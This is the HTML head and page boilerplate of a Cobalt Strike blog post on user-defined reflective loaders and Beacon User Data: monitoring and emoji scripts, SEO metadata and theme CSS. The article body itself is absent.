o},s}p.gm.Promise=e,Object.defineProperty(e,"name",{value:"Promise"}),e.toString=function(){return i.toString()},Object.setPrototypeOf(e,i),["all","race"].forEach((function(r){const n=i[r];e[r]=function(e){let i=!1;[...e||[]].forEach((e=>{this.resolve(e).then(a("all"===r),a(!1))}));const o=n.apply(this,arguments);return o;function a(e){return function(){t.emit("propagate",[null,!i],o,!1,!1),i=i||!e}}}})),["resolve","reject"].forEach((function(r){const n=i[r];e[r]=function(e){const r=n.apply(this,arguments);return e!==r&&t.emit("propagate",[e,!0],r,!1,!1),r}})),e.prototype=i.prototype;const o=i.prototype.then;i.prototype.then=function(...e){var i=this,a=r(i);a.promise=i,e[0]=n(e[0],"cb-",a,null,!1),e[1]=n(e[1],"cb-",a,null,!1);const s=o.apply(this,e);return a.nextPromise=s,t.emit("propagate",[i,!0],s,!1,!1),s},i.prototype.then[W.Jt]=o,t.on("executor-start",(function(e){e[0]=n(e[0],"resolve-",this,null,!1),e[1]=n(e[1],"resolve-",this,null,!1)})),t.on("executor-err",(function(e,t,r){e[1](r)})),t.on("cb-end",(function(e,r,n){t.emit("propagate",[n,!0],this.nextPromise,!1,!1)})),t.on("propagate",(function(e,r,n){this.getCtx&&!r||(this.getCtx=function(){if(e instanceof Promise)var r=t.context(e);return r&&r.getCtx?r.getCtx():this})}))}(),t}const Me={},Ke="setTimeout",Ue="setInterval",Ve="clearTimeout",Ge="-start",Fe=[Ke,"setImmediate",Ue,Ve,"clearImmediate"];function Be(e){const t=function(e){return(e||B.ee).get("timer")}(e);if(Me[t.debugId]++)return t;Me[t.debugId]=1;var r=(0,W.YM)(t);return r.inPlace(p.gm,Fe.slice(0,2),Ke+"-"),r.inPlace(p.gm,Fe.slice(2,3),Ue+"-"),r.inPlace(p.gm,Fe.slice(3),Ve+"-"),t.on(Ue+Ge,(function(e,t,n){e[0]=r(e[0],"fn-",null,n)})),t.on(Ke+Ge,(function(e,t,n){this.method=n,this.timerDuration=isNaN(e[1])?0:+e[1],e[0]=r(e[0],"fn-",this,n)})),t}const We={};function ze(e){const t=function(e){return(e||B.ee).get("mutation")}(e);if(!p.RI||We[t.debugId])return t;We[t.debugId]=!0;var r=(0,W.YM)(t),n=p.gm.MutationObserver;return n&&(window.MutationObserver=function(e){return this instanceof n?new n(r(e,"fn-")):n.apply(this,arguments)},MutationObserver.prototype=n.prototype),t}const{TZ:qe,d3:Ze,Kp:Ye,$p:Xe,wW:Je,e5:Qe,tH:$e,uP:et,rw:tt,Lc:rt}=Pe;class nt extends b{static featureName=qe;constructor(e,t=!0){if(super(e,qe,t),!p.RI)return;try{this.removeOnAbort=new AbortController}catch(e){}let r,n=0;const i=this.ee.get("tracer"),o=Le(this.ee),a=De(this.ee),s=Be(this.ee),c=Z(this.ee),u=this.ee.get("events"),d=ne(this.ee),l=ve(this.ee),f=ze(this.ee);function h(e,t){l.emit("newURL",[""+window.location,t])}function g(){n++,r=window.location.hash,this[et]=(0,S.t)()}function m(){n--,window.location.hash!==r&&h(0,!0);var e=(0,S.t)();this[Qe]=~~this[Qe]+e-this[et],this[rt]=e}function v(e,t){e.on(t,(function(){this[t]=(0,S.t)()}))}this.ee.on(et,g),a.on(tt,g),o.on(tt,g),this.ee.on(rt,m),a.on(Je,m),o.on(Je,m),this.ee.on("fn-err",((...t)=>{t[2]?.__newrelic?.[e.agentIdentifier]||(0,x.p)("function-err",[...t],void 0,this.featureName,this.ee)})),this.ee.buffer([et,rt,"xhr-resolved"],this.featureName),u.buffer([et],this.featureName),s.buffer(["setTimeout"+Ye,"clearTimeout"+Ze,et],this.featureName),c.buffer([et,"new-xhr","send-xhr"+Ze],this.featureName),d.buffer([$e+Ze,$e+"-done",$e+Xe+Ze,$e+Xe+Ye],this.featureName),l.buffer(["newURL"],this.featureName),f.buffer([et],this.featureName),a.buffer(["propagate",tt,Je,"executor-err","resolve"+Ze],this.featureName),i.buffer([et,"no-"+et],this.featureName),o.buffer(["new-jsonp","cb-start","jsonp-error","jsonp-end"],this.featureName),v(d,$e+Ze),v(d,$e+"-done"),v(o,"new-jsonp"),v(o,"jsonp-end"),v(o,"cb-start"),l.on("pushState-end",h),l.on("replaceState-end",h),window.addEventListener("hashchange",h,(0,A.jT)(!0,this.removeOnAbort?.signal)),window.addEventListener("load",h,(0,A.jT)(!0,this.removeOnAbort?.signal)),window.addEventListener("popstate",(function(){h(0,n>1)}),(0,A.jT)(!0,this.removeOnAbort?.signal)),this.abortHandler=this.#n,this.importAggregator(e)}#n(){this.removeOnAbort?.abort(),this.abortHandler=void 0}}var it=i(3333);class ot extends b{static featureName=it.TZ;constructor(e,t=!0){super(e,it.TZ,t);const r=[e.init.page_action.enabled,e.init.performance.capture_marks,e.init.performance.capture_measures,e.init.user_actions.enabled];p.RI&&e.init.user_actions.enabled&&(it.Zp.forEach((e=>(0,A.sp)(e,(e=>(0,x.p)("ua",[e],void 0,this.featureName,this.ee)),!0))),it.qN.forEach((e=>(0,A.sp)(e,(e=>(0,x.p)("ua",[e],void 0,this.featureName,this.ee)))))),r.some((e=>e))?this.importAggregator(e):this.deregisterDrain()}}var at=i(993),st=i(3785);class ct extends b{static featureName=at.TZ;constructor(e,t=!0){super(e,at.TZ,t);const r=this.ee;this.ee.on("wrap-logger-end",(function([e]){const{level:t,customAttributes:n}=this;(0,st.R)(r,e,n,t)})),this.importAggregator(e)}}new class extends o{constructor(t,r){super(r),p.gm?(this.features={},(0,R.bQ)(this.agentIdentifier,this),this.desiredFeatures=new Set(t.features||[]),this.desiredFeatures.add(w),this.runSoftNavOverSpa=[...this.desiredFeatures].some((e=>e.featureName===a.K7.softNav)),(0,d.j)(this,t,t.loaderType||"agent"),this.run()):(0,e.R)(21)}get config(){return{info:this.info,init:this.init,loader_config:this.loader_config,runtime:this.runtime}}run(){try{const t=u(this.agentIdentifier),r=[...this.desiredFeatures];r.sort(((e,t)=>a.P3[e.featureName]-a.P3[t.featureName])),r.forEach((r=>{if(!t[r.featureName]&&r.featureName!==a.K7.pageViewEvent)return;if(this.runSoftNavOverSpa&&r.featureName===a.K7.spa)return;if(!this.runSoftNavOverSpa&&r.featureName===a.K7.softNav)return;const n=function(e){switch(e){case a.K7.ajax:return[a.K7.jserrors];case a.K7.sessionTrace:return[a.K7.ajax,a.K7.pageViewEvent];case a.K7.sessionReplay:return[a.K7.sessionTrace];case a.K7.pageViewTiming:return[a.K7.pageViewEvent];default:return[]}}(r.featureName).filter((e=>!(e in this.features)));n.length>0&&(0,e.R)(36,{targetFeature:r.featureName,missingDependencies:n}),this.features[r.featureName]=new r(this)}))}catch(t){(0,e.R)(22,t);for(const e in this.features)this.features[e].abortHandler?.();const r=(0,R.Zm)();delete r.initializedAgents[this.agentIdentifier]?.api,delete r.initializedAgents[this.agentIdentifier]?.features,delete this.sharedAggregator;return r.ee.get(this.agentIdentifier).abort(),!1}}}({features:[he,w,N,Ne,_e,_,D,ot,ct,je,nt],loaderType:"spa"})})()})();</script> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /> <!-- This site is optimized with the Yoast SEO plugin v23.6 - https://yoast.com/wordpress/plugins/seo/ --> <title>Revisiting the UDRL Part 3: Beacon User Data | Cobalt Strike</title> <meta name="description" content="Learn UDRL&#039;s role in runtime masking, including how to track Beacon with BUD and loading an External C2 DLL at the same time as Beacon and mask both DLLs at runtime with Sleepmask-VS." /> <link rel="canonical" href="https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="Revisiting the UDRL Part 3: Beacon User Data | Cobalt Strike" /> <meta property="og:description" content="Learn UDRL&#039;s role in runtime masking, including how to track Beacon with BUD and loading an External C2 DLL at the same time as Beacon and mask both DLLs at runtime with Sleepmask-VS." /> <meta property="og:url" content="https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data" /> <meta property="og:site_name" content="Cobalt Strike" /> <meta property="article:published_time" content="2024-09-04T17:29:40+00:00" /> <meta property="article:modified_time" content="2024-09-04T18:36:38+00:00" /> <meta property="og:image" content="https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-1024x644.png" /> <meta name="author" content="Robert Bearsby" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:label1" content="Written by" /> <meta name="twitter:data1" content="Robert Bearsby" /> <meta name="twitter:label2" content="Est. reading time" /> <meta name="twitter:data2" content="10 minutes" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/#article","isPartOf":{"@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/"},"author":{"name":"Robert Bearsby","@id":"https://www.cobaltstrike.com/#/schema/person/259e31e9084378ede748f18aa59f012b"},"headline":"Revisiting the UDRL Part 3: Beacon User Data","datePublished":"2024-09-04T17:29:40+00:00","dateModified":"2024-09-04T18:36:38+00:00","mainEntityOfPage":{"@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/"},"wordCount":2154,"publisher":{"@id":"https://www.cobaltstrike.com/#organization"},"image":{"@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/#primaryimage"},"thumbnailUrl":"https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-1024x644.png","inLanguage":"en-US"},{"@type":"WebPage","@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/","url":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/","name":"Revisiting the UDRL Part 3: Beacon User Data | Cobalt Strike","isPartOf":{"@id":"https://www.cobaltstrike.com/#website"},"primaryImageOfPage":{"@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/#primaryimage"},"image":{"@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/#primaryimage"},"thumbnailUrl":"https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1-1024x644.png","datePublished":"2024-09-04T17:29:40+00:00","dateModified":"2024-09-04T18:36:38+00:00","description":"Learn UDRL's role in runtime masking, including how to track Beacon with BUD and loading an External C2 DLL at the same time as Beacon and mask both DLLs at runtime with Sleepmask-VS.","breadcrumb":{"@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/#primaryimage","url":"https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1.png","contentUrl":"https://www.cobaltstrike.com/app/uploads/2024/08/screenshot_process-hacker_beacon-extc2-dll-masked-1.png","width":2392,"height":1504},{"@type":"BreadcrumbList","@id":"https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-3-beacon-user-data/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.cobaltstrike.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"/blog/"},{"@type":"ListItem","position":3,"name":"Revisiting the UDRL Part 3: Beacon User Data"}]},{"@type":"WebSite","@id":"https://www.cobaltstrike.com/#website","url":"https://www.cobaltstrike.com/","name":"Cobalt Strike","description":"Adversary Simulation and Red Team Operations","publisher":{"@id":"https://www.cobaltstrike.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.cobaltstrike.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://www.cobaltstrike.com/#organization","name":"Cobalt Strike","url":"https://www.cobaltstrike.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.cobaltstrike.com/#/schema/logo/image/","url":"https://www.cobaltstrike.com/app/uploads/2023/06/fta-cobalt-strike-light-1.svg","contentUrl":"https://www.cobaltstrike.com/app/uploads/2023/06/fta-cobalt-strike-light-1.svg","width":242,"height":73,"caption":"Cobalt Strike"},"image":{"@id":"https://www.cobaltstrike.com/#/schema/logo/image/"}},{"@type":"Person","@id":"https://www.cobaltstrike.com/#/schema/person/259e31e9084378ede748f18aa59f012b","name":"Robert Bearsby","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.cobaltstrike.com/#/schema/person/image/","url":"https://secure.gravatar.com/avatar/74e08d440419c0a76d1b51837fd708d0?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/74e08d440419c0a76d1b51837fd708d0?s=96&d=mm&r=g","caption":"Robert Bearsby"},"url":"https://www.cobaltstrike.com/author/robert-bearsby"}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.cobaltstrike.com' /> <link rel="alternate" type="application/rss+xml" title="Cobalt Strike &raquo; Feed" href="https://www.cobaltstrike.com/feed" /> <script> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.cobaltstrike.com\/wp\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}}; /*! This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); </script> <style id='wp-emoji-styles-inline-css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.cobaltstrike.com/wp/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='basic-card-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/basic-card/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='card-carousel-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/card-carousel/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='checklist-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/checklist/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='checkmark-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/checkmark/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='diagonal-icons-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/diagonal-icons/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='embed-form-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/embed-form/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='event-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/event/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='faq-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/faq/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='image-carousel-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/image-carousel/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='large-circle-icons-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/large-circle-icons/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='logo-carousel-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/logo-carousel/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='resource-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/resource/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='tab-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/tab/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='testimonial-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/testimonial/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='testimonial-carousel-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/testimonial-carousel/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='vertical-dot-line-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/vertical-dot-line/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='vertical-timeline-left-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/vertical-timeline-left/style.min.css?ver=6.6.2' media='all' /> <link rel='stylesheet' id='vertical-timeline-right-style-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/blocks/vertical-timeline-right/style.min.css?ver=6.6.2' media='all' /> <style id='global-styles-inline-css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--color--lichen: #70A59A;--wp--preset--color--fern: #4D7F71;--wp--preset--color--forest: #006A56;--wp--preset--color--dusk: #004442;--wp--preset--color--sky: #8FE5F2;--wp--preset--color--cream: #E3E3E3;--wp--preset--color--mint: #77ECC2;--wp--preset--color--beige: #EBDBC1;--wp--preset--color--blue: #11719C;--wp--preset--color--navy: #004667;--wp--preset--color--gray: #A9A9A9;--wp--preset--color--charchoal: #363e49;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:root { --wp--style--global--content-size: 1100px;--wp--style--global--wide-size: 1100px; }:where(body) { margin: 0; }.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-content: center; margin-left: auto; margin-right: auto; }:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}.is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}body{padding-top: 0px;padding-right: 0px;padding-bottom: 0px;padding-left: 0px;}a:where(:not(.wp-element-button)){text-decoration: underline;}:root :where(.wp-element-button, .wp-block-button__link){background-color: #006A56;border-width: 0;color: #ffffff;font-family: inherit;font-size: inherit;line-height: inherit;padding: calc(0.667em + 2px) calc(1.333em + 2px);text-decoration: none;}:root :where(.wp-element-button:hover, .wp-block-button__link:hover){background-color: #004442;color: #ffffff;}:root :where(.wp-element-button:focus, .wp-block-button__link:focus){background-color: #004442;color: #ffffff;}:root :where(.wp-element-button:active, .wp-block-button__link:active){background-color: #004442;color: #ffffff;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-lichen-color{color: var(--wp--preset--color--lichen) !important;}.has-fern-color{color: var(--wp--preset--color--fern) !important;}.has-forest-color{color: var(--wp--preset--color--forest) !important;}.has-dusk-color{color: var(--wp--preset--color--dusk) !important;}.has-sky-color{color: var(--wp--preset--color--sky) !important;}.has-cream-color{color: var(--wp--preset--color--cream) !important;}.has-mint-color{color: var(--wp--preset--color--mint) !important;}.has-beige-color{color: var(--wp--preset--color--beige) !important;}.has-blue-color{color: var(--wp--preset--color--blue) !important;}.has-navy-color{color: var(--wp--preset--color--navy) !important;}.has-gray-color{color: var(--wp--preset--color--gray) !important;}.has-charchoal-color{color: var(--wp--preset--color--charchoal) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-lichen-background-color{background-color: var(--wp--preset--color--lichen) !important;}.has-fern-background-color{background-color: var(--wp--preset--color--fern) !important;}.has-forest-background-color{background-color: var(--wp--preset--color--forest) !important;}.has-dusk-background-color{background-color: var(--wp--preset--color--dusk) !important;}.has-sky-background-color{background-color: var(--wp--preset--color--sky) !important;}.has-cream-background-color{background-color: var(--wp--preset--color--cream) !important;}.has-mint-background-color{background-color: var(--wp--preset--color--mint) !important;}.has-beige-background-color{background-color: var(--wp--preset--color--beige) !important;}.has-blue-background-color{background-color: var(--wp--preset--color--blue) !important;}.has-navy-background-color{background-color: var(--wp--preset--color--navy) !important;}.has-gray-background-color{background-color: var(--wp--preset--color--gray) !important;}.has-charchoal-background-color{background-color: var(--wp--preset--color--charchoal) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) 